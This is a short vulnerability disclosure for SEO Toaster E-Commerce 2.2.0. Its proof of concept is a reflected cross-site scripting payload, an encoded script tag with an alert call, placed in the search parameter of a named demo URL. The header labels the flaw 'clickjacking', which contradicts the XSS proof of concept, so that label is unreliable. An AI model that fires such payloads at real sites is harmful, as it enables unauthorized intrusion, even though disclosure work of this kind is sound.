# Affected software: http://demo.seotoaster.com # Type of vulnerability: clickjacking # Version: E-Commerce 2.2.0 # URL: http://www.seotoaster.com/ # Discovered by: Provensec # Website: http://www.provensec.com # Description:Free SEO Software & CMS: All in One # Proof of concept seo toaster search filed was vuln to xss http://demo.seotoaster.com/search-results.html?search=%3C%2Fscript%3E%3Cscript%3Ealert%28/provensec/%29%3C%2Fscript%3E Source